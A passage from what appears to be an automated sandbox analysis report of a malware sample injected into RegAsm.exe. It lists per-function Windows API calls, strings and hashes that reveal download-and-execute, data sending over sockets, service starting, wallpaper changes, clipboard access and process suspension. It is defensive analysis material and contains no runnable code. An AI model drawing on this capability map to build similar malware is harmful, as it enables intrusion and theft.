                          • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ManagerStart
                          • String ID:
                          • API String ID: 276877138-0
                          • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                          • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                          • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                          • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                          APIs
                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                          • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: ACP$OCP
                          • API String ID: 2299586839-711371036
                          • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                          • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                          • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                          • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                          APIs
                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                          • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                          • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                          • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID: SETTINGS
                          • API String ID: 3473537107-594951305
                          • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                          • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                          • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                          • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                          APIs
                          • __EH_prolog.LIBCMT ref: 004096A5
                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstH_prologNext
                          • String ID:
                          • API String ID: 1157919129-0
                          • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                          • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                          • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                          • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                          APIs
                          • __EH_prolog.LIBCMT ref: 0040884C
                          • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                          • String ID:
                          • API String ID: 1771804793-0
                          • Opcode ID: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                          • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                          • Opcode Fuzzy Hash: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                          • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DownloadExecuteFileShell
                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                          • API String ID: 2825088817-3056885514
                          • Opcode ID: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                          • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                          • Opcode Fuzzy Hash: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                          • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFind$FirstNextsend
                          • String ID: XPG$XPG
                          • API String ID: 4113138495-1962359302
                          • Opcode ID: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                          • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                          • Opcode Fuzzy Hash: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                          • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                          APIs
                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                            • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                            • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                            • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateInfoParametersSystemValue
                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                          • API String ID: 4127273184-3576401099
                          • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                          • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                          • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                          • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                          • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID: p'E$JD
                          • API String ID: 1084509184-908320845
                          • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                          • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                          • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                          • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorInfoLastLocale$_free$_abort
                          • String ID:
                          • API String ID: 2829624132-0
                          • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                          • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                          • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                          • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                          • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                          • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                          • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                          • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                          • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                          • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                          APIs
                          • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                          • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                          • ExitProcess.KERNEL32 ref: 10004AEE
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                          • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                          • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                          • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                          APIs
                          • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                          • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                          • ExitProcess.KERNEL32 ref: 0044338F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                          • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                          • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                          • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Clipboard$CloseDataOpen
                          • String ID:
                          • API String ID: 2058664381-0
                          • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                          • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                          • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                          • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                          APIs
                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                          • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                          • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseHandleOpenResume
                          • String ID:
                          • API String ID: 3614150671-0
                          • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                          • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                          • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                          • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                          APIs
                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                          • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseHandleOpenSuspend
                          • String ID:
                          • API String ID: 1999457699-0
                          • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                          • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                          • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                          • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID: MZ@
                          • API String ID: 2325560087-2978689999
                          • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                          • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                          • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                          • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: .
                          • API String ID: 0-248832578
                          • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                          • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                          • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                          • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .
                          • API String ID: 0-248832578
                          • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                          • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                          • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                          • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                          • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID: JD
                          • API String ID: 1084509184-2669065882
                          • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                          • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                          • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                          • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                          APIs
                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: GetLocaleInfoEx
                          • API String ID: 2299586839-2904428671
